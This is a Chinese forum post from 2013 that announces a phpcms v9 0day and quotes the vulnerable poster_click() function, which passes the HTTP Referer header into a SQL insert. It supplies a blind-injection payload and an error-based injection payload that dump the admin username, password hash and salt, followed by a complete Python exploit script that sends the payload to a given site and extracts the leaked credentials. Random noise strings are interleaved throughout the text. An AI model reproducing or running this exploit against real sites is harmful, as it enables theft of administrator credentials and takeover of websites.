有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:/ G& ]& r6 p& J0 M
9 _4 S# l' o. U# x" |- @3 o问题函数\phpcms\modules\poster\index.php
: V v) G! l& Q. S+ J @5 [/ V1 V& a( H9 X0 y8 k
public function poster_click() {. f1 q8 Y/ G0 B
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;9 B: O" b7 t5 k. ?) O
$r = $this->db->get_one(array('id'=>$id));
- h0 x& y) ?0 c7 j0 p5 V- nif (!is_array($r) && empty($r)) return false;
2 m! B0 e4 N ]0 X% ]% `* e# {$ip_area = pc_base::load_sys_class('ip_area');
1 W" l% A+ q% ]$ x$ip = ip();
. q9 h. [9 V: K/ c' ^( u$area = $ip_area->get($ip);
) J/ e' j4 h9 ]' _. |% Y$username = param::get_cookie('username') ? param::get_cookie('username') : '';7 ?" o( x4 B/ l3 x
if($id) {
4 f( |; [+ F$ t$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
e3 Z9 s6 i- l$ U" r2 ^( o$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
+ V/ Y: E+ K9 Y" e& S& Z}, r0 n/ F7 a( T- T/ M
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));9 l+ B1 U2 [+ P8 e- S% e( m% ~0 U' g/ u
$setting = string2array($r['setting']);/ n4 O# Z( A5 C
if (count($setting)==1) {3 E3 F! f% T! e- r1 m
$url = $setting['1']['linkurl'];
3 W+ L/ J. v/ B# f; o) R} else {9 l7 X2 g; D! {& P
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];+ V8 O. Q& Y5 ~# J q
}
& ]' |( A) T ~# cheader('Location: '.$url);
* K9 R2 J* R4 p}
& c1 q: ~5 P8 d- M# J6 ^2 x0 i: Z, }5 k: ?
! I& k. W8 v& s6 M3 }7 V3 U+ D0 t# \! [8 I9 P2 F
利用方式:
& @1 {, H/ U% y) P8 T) o3 J- c4 @- I: k% o
1、可以采用盲注入的手法:
4 h) P2 c' r- @) O* H( l
[( ?$ a! X, u3 v" sreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)## |2 j6 I7 d1 N" L
+ _+ p' O+ @ Z. @, q6 f
通过返回页面,正常与否一个个猜解密码字段。
1 f4 [! c7 ~1 m0 c7 p7 C4 `& ~6 u1 c8 i1 H* Z
2、代码是花开写的,随手附上了:
# O3 D6 m& ]* {1 K5 s8 Y+ s
! n0 P% q+ a- a* F+ g: g, y1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
V( i: @: k6 t6 t b3 x* v# K( C7 g
) K H: l0 Y5 ?; V8 ?% P此方法是爆错注入手法,原理自查。
. C" v, p5 c: [4 [. S
( O! @6 b( `5 Z7 X8 s. a $ \5 O# A# [1 F" R
+ _. h/ g! i6 V利用程序:
" M+ A& j1 p o
- J# D! M% x" ?% ^' C/ u0 q#!/usr/bin/env python
/ X% k: L/ \: M! U8 o2 C3 cimport httplib,sys,re
" A# U. H; `" S( P. P6 I& X3 X0 G7 [1 n3 p2 w
def attack():# y9 h# x8 F% y
print “Code by Pax.Mac Team conqu3r!”- m9 S, e) o& R5 V6 m9 T% l6 \& \
print “Welcome to our zone!!!”
D! c2 ?# b- p" Murl=sys.argv[1]
7 J2 o3 d$ O& z: K. b) opaths=sys.argv[2]
, q4 E1 Q# D! @& Q/ t" A: _& p/ ?conn = httplib.HTTPConnection(url)
- {, x o4 ~( W! b+ z& xi_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
( b, e7 [( y3 }; {1 g3 A! U“Accept”: “text/plain”,
7 `8 r0 R3 |3 R“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}1 R% V7 A) ?: B3 C; y$ Q6 S9 o
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
1 b4 P* N3 Q1 g, N$ I# y9 b" nr1 = conn.getresponse()3 j3 }& [8 @) b, b# Q6 o
datas=r1.read()
" }. f/ ~, ~, i; ]datas=re.findall(r”Duplicate entry \’\w+’”, datas)$ p9 O+ w* B! f% k4 [ D
print datas[0]; c, n# C% L- P/ P/ b
conn.close()
/ p9 V9 | [1 C3 C" W4 O) ?if __name__==”__main__”:
" H" k# J" g. n: tif len(sys.argv)<3:6 B5 v$ h) K7 w3 ^/ v% o2 W, _
print “Code by Pax.Mac Team conqu3r”
; q' V4 y' e0 ]print “Usgae:”* _! W* m) {7 N0 r4 \
print “ phpcmsattack.py www.paxmac.org /”$ K y2 J; _$ @6 b3 H) A. k5 t
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
0 z/ m. x0 p4 s6 ysys.exit(1)8 K G; G7 U4 S/ r* ?
attack()% I) g8 \# o( _$ }# a, F2 J
: X: |* ^9 h3 C# r7 j' J) m! `
|
发表于 2013-1-11 21:01:00
收藏
支持
反对